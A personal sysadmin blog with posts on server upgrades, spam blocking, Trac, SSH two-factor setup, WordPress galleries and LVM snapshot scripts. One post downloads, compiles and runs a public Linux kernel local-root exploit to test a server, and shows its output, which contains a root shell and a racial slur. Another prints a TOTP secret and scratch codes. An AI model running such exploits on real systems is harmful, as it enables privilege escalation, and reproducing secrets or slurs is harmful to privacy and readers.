Just my Blog

Recently I had to upgrade MySQL and PHP to enable the latest and greatest version of WordPress on a server.

The server is currently still running CentOS 4, but didn't want to upgrade it to a newer major version. Thanks to the builds of Jason Litka for RHEL4/CentOS 4, I was able to upgrade the packages...

Finally I was able to upgrade the following packages:

• MySQL from version 4.1.22 to 5.1.58


• PHP from version 4.3.9 to 5.2.17


• Apache from version 2.0.52 to 2.2.21

You can easily enable the repo by adding a .repo file to /etc/yum.repos.d/ on your box with the following content:

[utterramblings]
name=Jason's Utter Ramblings Repo
baseurl=http://www.jasonlitka.com/media/EL$releasever/$basearch/
enabled=1
gpgcheck=1
gpgkey=http://www.jasonlitka.com/media/RPM-GPG-KEY-jlitka

Please note that some modules are changed if you upgrade Apache from 2.0 to 2.2, for example mod_access functionality moved into mod_authz_host.

Another "weird" thing was that the dovecot package had a dependency on /usr/lib/mysql/libmysqlclient.so.14,  this can be solved by installing the mysqlclient14.i386 rpm.

If you have your own MTA running... you are probably known with the spam-problems... Once you've tuned the filters, you have to do it again... because a new spam-run comes in. I also blocked whole /8 subnets in different countries (India/China/...)... but that is not a "real" solution... aka I want to block the whole country...

 The "DNSBL" countries.nerd.dk  allows you to do so... the map ip-adresses to countries based on whois-information... so on my MTAs I added the following lines to the mc sendmail file:

FEATURE(dnsbl,`br.countries.nerd.dk', `554 - Rejected - SPAM from Brazil:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`in.countries.nerd.dk', `554 - Rejected - SPAM from India:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`kr.countries.nerd.dk', `554 - Rejected - SPAM from Korea:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`cn.countries.nerd.dk', `554 - Rejected - SPAM from China:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`ro.countries.nerd.dk', `554 - Rejected - SPAM from Romenia:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`co.countries.nerd.dk', `554 - Rejected - SPAM from Colombia:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`mk.countries.nerd.dk', `554 - Rejected - SPAM from Macedonia:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`vn.countries.nerd.dk', `554 - Rejected - SPAM from Vietnam:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`ru.countries.nerd.dk', `554 - Rejected - SPAM from Russia:$&{client_addr} rejected')dnl

And within a few hours the first are already blocked... I hope this will reduce the amount of incomming spam at the "front door". Because simply... I don't know people in these countries...

Some while ago I installed a FreeBSD server with 7.3-PRERELEASE, although now I wanted to have it properly upgraded to 7.3-RELEASE.

I looked into it quite often... although run into the issue that it didn't work...

# uname -r
7.3-PRERELEASE
# freebsd-update upgrade -r 7.3-RELEASE
Looking up update.FreeBSD.org mirrors... 4 mirrors found.
Fetching public key from update4.FreeBSD.org... failed.
Fetching public key from update3.FreeBSD.org... failed.
Fetching public key from update5.FreeBSD.org... failed.
Fetching public key from update2.FreeBSD.org... failed.
No mirrors remaining, giving up.

On the FreeBSD forum I found the following thread:

http://lnk.adslweb.net/udvvmL

Based on the information there I performed the following steps:

# env UNAME_r=7.3-RELEASE freebsd-update -v debug fetch -r 7.3-RELEASE

Then install the updates:

# env UNAME_r=7.3-RELEASE freebsd-update -v debug install

And as last step do a reboot, and the result is:

# uname -r
7.3-RELEASE-p7

Recently I run into the problem that a team had a requirement for subversion 1.6.6 (while CentOS 5u3 was not supporting this... but the vendor didn't provide a newer release). This team also had a requirement to have TRAC... TRAC is depended on Python... but I was not allowed to update the subversion bindings for python by updating the it on the whole system... so... this is what I did:

• Installed a number of devel packages:
  
  
  
  

     # yum install apr-devel neon{,-devel} apr-util-devel
  
  

  
  


• Compiled sqlite version 3.6.13 and installed it on NFS:
  
  
  
  

    $ ./configure --prefix=/nfs/apps/webservices/trac-parent/sqlite/3.6.13
  
    ...
  
    $ make ; make install
  
    ...

  
  


• Compiled subversion 1.6.6 and installed it on NFS:
  
  
  
  

  $ make clean; ./configure \
  
   --prefix=/nfs/apps/webservices/trac-parent/subversion/1.6.6 \
  
   --with-sqlite=/nfs/apps/webservices/trac-parent/sqlite/3.6.13 \
  
   --without-neon 
  
  ...
  
  $ make -j8 ; make install ; make swig-py ; make install-swig-py
  
  

  
  

  …

  
  


• Added the following line to /etc/sysconfig/httpd:
  
  
  
  

  export LD_LIBRARY_PATH=/nfs/apps/webservices/trac-parent/sqlite/3.6.13/lib/
  
  

  
  


• Modified /etc/httpd/conf.d/trac.conf by adding a ‘PythonPath’ to the location-directive:
  
  
  
  

  <Location /projects>
  
    ...
  
    PythonPath "['/nfs/apps/webservices/trac-parent/subversion/1.6.6/lib/svn-python'] + sys.path"
  
  </Location>
  
  

  
  


• Restart the trac daemon:
  
  
  
  

  # service httpd stop
  
  # service httpd start
  
  

  
  


• Now you’ve to resync the trac-instance with Subversion (the
  repository_dir value in the trac.ini of the instance).. but make sure
  you use the correct bindings in Python:
  
  
  
  

  # export LD_LIBRARY_PATH=/nfs/apps/webservices/trac-parent/sqlite/3.6.13/lib/
  
  # export PYTHONPATH=/nfs/apps/webservices/trac-parent/subversion/1.6.6/lib/svn-python
  
  # trac-admin ${TRAC_INSTANCE_PATH} repository resync "*"
  
  

  
  

Today I noticed a very nice article about enabling Google's two-factor authentication for Linux SSH.

After reading it... I found some time to play with it... so I enabled it within 10 minutes on my CentOS 5 64bit play-ground server... but there are some small 'caveats'.

hg - Command

To checkout the code, you must make install the mercurial RPM... this one is available via the EPEL repositories.

So after having the EPEL repositories enabled, run as root:

yum -y install mercurial

Compiling the PAM module

When you checked out the code.

hg clone https://google-authenticator.googlecode.com/hg/ google-authenticator/

You cannot compile directly the module... therefor you must apply a small change to the Makefile.

Change where /usr/lib/libdl.so is stated to /usr/lib64/libdl.so (3 occurrences)

$ make
$ sudo make install

Now you've to update the /etc/pam.d/sshd so it contains:

#%PAM-1.0
auth       required     pam_google_authenticator.so
auth       include      system-auth
account    required     pam_nologin.so
account    include      system-auth
password   include      system-auth
session    optional     pam_keyinit.so force revoke
session    include      system-auth
session    required     pam_loginuid.so

Configure SSH

You also have to make sure that in /etc/ssh/sshd_config the following settings are set on yes:

ChallengeResponseAuthentication yes
UsePAM yes

And restart the SSH-daemon

Set up your smartphone/credentials on the system

$ google-authenticator
https://www.google.com/chart?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/user@server%3Fsecret%3DSAEP64T5VZAVWAFB
Your new secret key is: SAEP64T5VZAVWAFB
Your verification code is 376046
Your emergency scratch codes are:
  67868696
  26247332
  54815527
  54336661
  71083816
Do you want me to update your "~/.google_authenticator" file (y/n) y
Do you want to disallow multiple uses of the same authentication
token? This restricts you to one login about every 30s, but it increases
your chances to notice or even prevent man-in-the-middle attacks (y/n) y
By default, tokens are good for 30 seconds and in order to compensate for
possible time-skew between the client and the server, we allow an extra
token before and after the current time. If you experience problems with poor
time synchronization, you can increase the window from its default
size of 1:30min to about 4min. Do you want to do so (y/n) n
If the computer that you are logging into isn't hardened against brute-force
login attempts, you can enable rate-limiting for the authentication module.
By default, this limits attackers to no more than 3 login attempts every 30s.
Do you want to enable rate-limiting (y/n) y

And you're done

Give it a try to SSH to that box...

 TIP: Make sure you've an SSH session still open... or you might lock yourself out of the system...

Recently I've been working on creating a template for WordPress for my brother in law's company. My brother in law is photographer so I had also had to implement albums/galleries using "jQuery jFlip". So I decided to use the "NextGEN Gallery" plugin for WordPress.

The benefit of NextGEN Gallery is that it allows you to add custom gallery templates to your WordPress template/theme by having in your theme-folder a nggallery folder and files named gallery-{template_name}.php.

To enable jQuery jFlip with NextGEN Gallery I had to do the following modifications:

Add to $TEMPLATE_PATH/header.php the following lines in the head section:

<!--[if IE]><script src="<?php bloginfo('template_url'); ?>/js/excanvasX.js" type="text/javascript"></script><![endif]-->
<script src="<?php bloginfo('template_url'); ?>/js/jquery-1.6.1.min.js" type="text/javascript"></script>
<script src="<?php bloginfo('template_url'); ?>/js/jquery.jflip-0.4.min.js" type="text/javascript"></script>

Make sure you put jquery-1.6.1.min.js and jquery-jflip-0.4.min.js and excanvasX.js (for IE support) in your template, or deep link to the developer sites.

And now create a NextGEN template $TEMPLATE_PATH/nggallery/gallery-flippage.php:

<?php if (!defined ('ABSPATH')) die ('No direct access allowed'); ?><?php if (!empty ($gallery)) : ?>
<script type="text/javascript">
  jQuery.noConflict();
  $(function(){
    $("#gallery1").jFlip(600,300,{background:"transparent",cornersTop:false,scale:"fit"});
   })
</script>
<p>&nbsp;</p>
<center>
<ul id="gallery1">
   <?php foreach ( $images as $image ) : ?>
     <li><img src="<?php echo $image->imageURL ?>" /></li>
    <?php endforeach; ?>
</ul>
</center>
<?php endif; ?>

Please note the 'jQuery.noConflict()'... please make sure it's there other wise it will drive you crazy

Now make sure the NextGen gallery plugin is active and make a page in WordPress with the following content:

[nggallery id=5 template=flippage]

 That's all

And the results can be checked here.

I recently had the need to forward e-mail based on the from field to another mailbox. I know, it's possible with a simple .forward in your $HOME, but that will forward all the mail.

So after some further searching I end up with the following rule for your maildrop filter... it simply checks if the mail (in this example) is from linus@mail.example.com  and will forward it to linuxbox@collector.example.com:

if ( /^From: .*linus@mail\.example\.com.*/ )
{
        dotlock "forward.lock" {
          log "Forward mail"
          to "|/usr/sbin/sendmail linuxbox@collector.example.com"
        }
}

And that's all you need to put add to your $HOME/.mailfilter

Recently I've moved the web albums of my kids from my own webserver to Google Picasa. But... I wanted to keep my nice javascript based carousel

In the current code I already had some PHP-code that creates the content of the carousel using an array. Now I added two new features in the 'website'.

1. Config files


2. Downloading the RSS (XML) feed and cache it


3. Extract the URLs with the photos from the XML feed.

1. Config files

One 'global' config:

<?php
 cacheLocation="/tmp/picasa-cache/";
 $cacheTTL = 60;
?>

Per album I've a config.php in that directory, so for example we've the following content:

 <?php
  $xmlURL='http://picasaweb.google.com/data/feed/base/user/k/id/123456970123ASBD1?alt=rss';
  $AlbumDescription="Rick de Rijk";
  $PicasaURL="http://picasaweb.google.com/paderijk/Rick";
  $ShortName="rick";
  $xmlFile="$cacheLocation/$ShortName.xml";
?>

2. Download the RSS (XML) feed and cache it:

<?php
# Code that takes care of the caching
#
if (!(file_exists($xmlFile) &&
    (time() - $cacheTTL < filemtime($xmlFile))
  )) {
    //unlink($xmlFile);
    $data = file_get_contents($xmlURL);
    $f = file_put_contents($xmlFile, $data);
  }
?>

3. Extract the URLs with the photos from the feed

<?php
$foto_array = array();
$xml = new SimpleXMLElement($xmlFile, null, true);

$urls = $xml->xpath("channel/item/enclosure/@url");

foreach ($urls as $image_url)
{
  array_push($foto_array, $image_url);
}
?>

That's all

A lot of discussion is about one of the last kernel exploits... the one that you can become root using 32bit code on a 64bit machine. So I wanted to know if I'm vulnerable as well... just wanted to know how it works

So I simply did (as normal user) on a vulnerable version of the Linux kernel on CentOS 5.5:

$ mkdir /tmp/expl
$ wget -O /tmp/expl/expl.c http://www.seclists.org/fulldisclosure/2010/Sep/att-268/ABftw_c.bin
$ gcc -m32 -o /tmp/expl/expl.exe /tmp/expl/expl.c

Now run the binary:

[pieter@testbox ~]$ whoami
pieter
[pieter@testbox ~]$ /tmp/expl/expl.exe
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-128.7.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff8030d360
$$$ dummy_security_ops->ffffffff80496c00
$$$ capability_ops->ffffffff8030ec20
$$$ selinux_enforcing->ffffffff80499960
$$$ audit_enabled->ffffffff80485124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# whoami
root
sh-3.2#

Well... I don't like that... so... update the kernel, reboot and check again!

[pieter@testbox ~]$ whoami
pieter
[pieter@testbox ~]$ /tmp/expl/expl.exe
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.17.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!
[pieter@testbox ~]$

Some months ago I upgraded my CentOS servers from version 5.4 to 5.5. One of these servers were running LDAP Master and LDAP Slave as playground. Although after the upgrade to CentOS 5.5 it was broken, but due to other priorities I didn't had a change to fix it. 

On my systems I enabled TLS to communicate to LDAP-servers and also enabled kerberos. So this results in a modified /etc/sysconfig/ldap:

# Enable Kerberos
export KRB5_KTNAME="FILE:/etc/openldap/ldap.keytab"

But I noticed that the RPM installed a new version of that, although with the extension .rpmnew. So after applying the changes that were in the .rpmnew file and when I set SLAPD_LDAPS and SLAPD_LDAPI to "yes" I end up with the following content:

# Parameters to ulimit called right before starting slapd
# - use this to change system limits for slapd
ULIMIT_SETTINGS=

# How long to wait between sending slapd TERM and KILL
# signals when stopping slapd by init script
# - format is the same as used when calling sleep
STOP_DELAY=3s

# By default only listening on ldap:/// is turned on.
# If you want to change listening options for slapd,
# set following three variables to yes or no
SLAPD_LDAP=yes
SLAPD_LDAPS=yes
SLAPD_LDAPI=yes
export KRB5_KTNAME="FILE:/etc/openldap/ldap.keytab"

And guess what... It works again

Sometimes I'm really surprised about myself... especially how lazy I am.

I'm currently playing around with one of my private websites, and to improve developing I decided to use subversion. So far so good, but I wanted that the committed subversion code was automatically online on the webserver. So I did the following very simple trick.

First I check out the code (subtree) from the subversion server (which is using https):

$ cd /sites
$ mv dev.adslweb.net{,-backup}
$ svn co https://svn.adslweb.net/svn/websites/dev.adslweb.net

Next step was to commit the current content of the website into subversion:

$ cd /sites/dev.adslweb.net
$ cp -Rv /sites/dev.adslweb.net-backup/*  ./
$ svn add *
$ svn commit -m "Initial commit of ADSLWEB.net dev env"

Now download the simple script I created for making sure that subversion doesn't fire off twice for updating the same tree.

Download svn-update.sh via this link.

So something like this:

$ mkdir ~/scripts/
$ cd ~/scripts
$ wget http://www.xs4all.nl/~paderijk/pics/svn-update.sh
$ chmod 700 svn-update.sh

Now... the last step... create a crontab entry with the following content:

*/1 * * * * /home/pieter/scripts/svn-update.sh /sites/dev.adslweb.net 2>&1 > /dev/null

 And guess... and it works like a charm, on every new commit done by whoever... you get your online site updated within 1 minute without the need log in into the website/webserver using ftp/ssh/whatever.

In the past I started syncing every night the Updates-repositories from Fedora and CentOS on a local server, just to speed up updates/kick starts et cetera... The first version of the script was very quick and dirty, now I've a more decent script that allow you to add/remove very quick new versions of CentOS and Fedora.

 You can find the script here.

As I mentioned in my previous post, which is already 2 months old :(, I'm using snapshots for data retention.

Now I run up in the situation, that I wanted to know how full the snapshots are. A 'normal' df will not work... but I figured it out! The command lvs is willing to do the work:

# lvs --aligned --separator \| vol_backup
  LV                |VG        |Attr  |LSize |Origin|Snap% |Move|Log|Copy% |Convert
  lvm0              |vol_backup|owi-ao|40.00G|      |      |    |   |      |      
  snap-20100412_2350|vol_backup|swi-a-| 4.00G|lvm0  | 23.71|    |   |      |      
  snap-20100413_2350|vol_backup|swi-a-| 4.00G|lvm0  | 21.70|    |   |      |      
  snap-20100414_2350|vol_backup|swi-a-| 4.00G|lvm0  | 19.52|    |   |      |      
  snap-20100415_2350|vol_backup|swi-a-| 4.00G|lvm0  | 17.53|    |   |      |      
  snap-20100416_2350|vol_backup|swi-a-| 4.00G|lvm0  | 15.54|    |   |      |      
  snap-20100417_2350|vol_backup|swi-a-| 4.00G|lvm0  | 13.56|    |   |      |      
  snap-20100418_2350|vol_backup|swi-a-| 4.00G|lvm0  | 11.56|    |   |      |      
  snap-20100419_2353|vol_backup|swi-a-| 4.00G|lvm0  |  9.02|    |   |      |      
  snap-20100420_2353|vol_backup|swi-a-| 4.00G|lvm0  |  6.76|    |   |      |      
  snap-20100421_2350|vol_backup|swi-a-| 4.00G|lvm0  |  2.79|    |   |      | 

In the 'Snap%' column you can see how full your snapshot volume is!

Normally I used to have a backup-retention-script in place that will create a TAR-ball of the backup data (using Herakles). But this way I was not able to have a retention of longer then 3 days

So I had to look into another solution, I could add a new harddrive in the server... but there should be something else possible. So I ended up by using LVM snapshots. So I created a Volume group of about 100GB. In that volume group I created a logical volume of about 30GB, which is enough (and if not, we can 'grow' the Filesystem thanks to LVM )

After having all that done, I've created a script located in /root/scripts/lvm-snapshot. This script runs every midnight and creates a snapshot.

#!/bin/bash
#
# Create LVM Snapshots
#
#
#---------------------------------------------------------------------------------------------------------------
CURRENT_SNAPNAME="snap-"$(date "+%Y%m%d%H%M%S")
VOLUME2SNAPSHOT="/dev/vol_backup/lvm0"
LVMSNAPSHOTCMD="/usr/sbin/lvcreate -L 2G -s -n $CURRENT_SNAPNAME $VOLUME2SNAPSHOT"
LINE="---------------------------------------------------------------------------------------------------------------------"

echo $LINE
df -h /mnt/data
echo $LINE
$LVMSNAPSHOTCMD 2> /dev/null
#---------------------------------------------------------------------------------------------------------------
SNAPSHOT_RETENTION=15
CURRENT_SNAPSHOT_COUNT=$(lvdisplay | grep "^  LV Name                /dev/vol_backup/snap" | sort | awk '{ print $3 }' | wc -l)

OVERFLOW=$(echo $CURRENT_SNAPSHOT_COUNT - $SNAPSHOT_RETENTION | bc)
if [ $OVERFLOW -gt 0 ];
then
        echo $LINE
        for files in  $(lvdisplay | grep "^  LV Name                /dev/vol_backup/snap" | sort | awk '{ print $3 }' | head -n$OVERFLOW);
        do
                 /usr/sbin/lvremove -f $files 2> /dev/null
        done
fi
#---------------------------------------------------------------------------------------------------------------
echo $LINE
/usr/sbin/vgdisplay vol_backup
echo $LINE
/usr/sbin/lvdisplay $VOLUME2SNAPSHOT

And the crontab entry is:

# crontab -l
0 0 * /root/scripts/lvm-snapshot

Last monday, I had to 'secure' the smcwebserver from Sun (or should I say Oracle?), that is used by ARCo. But I run into a few issues:

1. My lack of knowledge about Java;


2. Keytool doesn't allow you to import keys generated by tools like openssl

But... I was able to handle them both and know I have an smcwebserver (which is using Java-keystores) running with a key that was generated by openssl and a certificated signed by our enterprise CA.

There for I had to do some Java 'hacking'. After some hours spending on Google-searches, I landed on a posting on the website of 'Agent Bob'. He has some Java-program that allows you to 'import' keys and certificates that were generated outside keytool

Although, I had to perform some minor modification on the Java-code, to set the password of the new JKS to 'changeit', because that is what smcwebserver will try to open the keystore. So, you need to make sure that line 87 is:

String keypass = "changeit";

For your convenience you can download the modified version here.

Now, create a Java class with the command (please note, I'm not a Java-specialist, so something else will work as well... but this worked for me ):
$ javac ImportKey.java

Having this done, you must make sure, your key-file and (signed) certificate are in the DER format. If they are not, you can convert them using the following commands:
$ openssl pkcs -topk8 \
               -nocrypt \
               -in server.key \
               -out server.key.der \
               -outform der

$ openssl x509 -in server.crt \
               -out server.crt.der \
               -outform der

We can import the keys with the Java-program:

$ java ImportKey server.key.der server.crt.der webconsole

And last, but not least, put the keystore in place (and of course we make sure we've a backup of the old one):

# cp /var/opt/webconsole/domains/console/conf/keystore.jks{,.backup}
# cp $HOME/keystore.ImportKey /var/opt/webconsole/domains/console/conf/keystore.jks

Now we have to restart the smcwebserver:

# smcwebserver stop
# smcwebserver start

That's all